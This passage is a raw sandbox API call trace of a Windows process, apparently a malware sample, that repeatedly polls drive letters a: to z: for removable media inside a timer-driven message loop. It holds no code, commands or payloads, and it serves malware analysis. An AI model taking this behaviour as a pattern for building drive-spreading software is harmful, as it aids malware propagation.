wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 1 [0216.966] TranslateMessage (lpMsg=0x7dfde4) returned 0 [0216.966] DispatchMessageW (lpMsg=0x7dfde4) returned 0x0 [0216.966] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.966] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.966] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.966] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0216.966] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.966] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.966] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0216.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.967] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0216.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0216.967] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0216.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0216.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.967] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0216.967] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0216.967] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.967] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.968] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.968] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.968] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.968] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.968] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.968] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.968] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.969] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.969] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.969] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.969] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.970] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.970] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.970] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.970] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.970] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.971] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.971] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.971] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.972] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.972] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.972] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.972] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.972] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.972] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0216.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0216.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0216.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.973] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0216.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0216.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e40 [0216.973] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.973] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e40 | out: hHeap=0x12c0000) returned 1 [0216.974] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0216.974] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.974] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0216.974] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.974] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0216.974] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.974] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0216.974] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.974] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.974] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.974] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.974] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.974] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.974] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.974] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.974] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.974] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.974] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.974] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.974] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.974] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.974] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.974] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.974] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.974] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0216.974] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.975] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.975] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0216.975] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.975] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.975] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.975] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.975] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.975] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.975] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.975] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0216.975] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.975] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.975] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.975] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.975] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.975] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.975] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.976] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.976] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.976] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.977] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.977] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.977] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.977] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.977] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.978] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.978] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.978] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.978] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.978] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.978] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.979] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.979] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.979] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.979] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.979] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.980] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.980] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.980] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0216.980] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0216.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.980] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0216.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.981] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0216.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0216.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260a0 [0216.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260a0 | out: hHeap=0x12c0000) returned 1 [0216.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0216.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0216.981] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0216.981] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0216.981] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0216.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.981] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0216.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.982] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.982] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0216.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.982] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0216.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0216.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.982] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0216.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0216.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0216.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0216.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0216.983] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0216.983] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.983] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.983] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.983] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.983] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.983] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.983] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.984] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.984] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.984] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.984] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.984] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.984] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.985] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.985] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.985] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.985] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.985] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.985] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.986] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.986] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.987] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.987] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.987] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.987] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.988] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.988] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.991] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0216.991] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0216.991] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0216.991] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.992] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.992] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.992] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.992] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.992] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0216.992] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.992] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.992] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.992] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.992] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.992] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.992] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.992] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.992] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.992] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.993] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.993] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0216.993] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f20 [0216.993] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.993] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.993] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.993] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f20 | out: hHeap=0x12c0000) returned 1 [0216.993] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.993] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.993] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0216.993] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.993] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0216.993] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.993] HeapFree 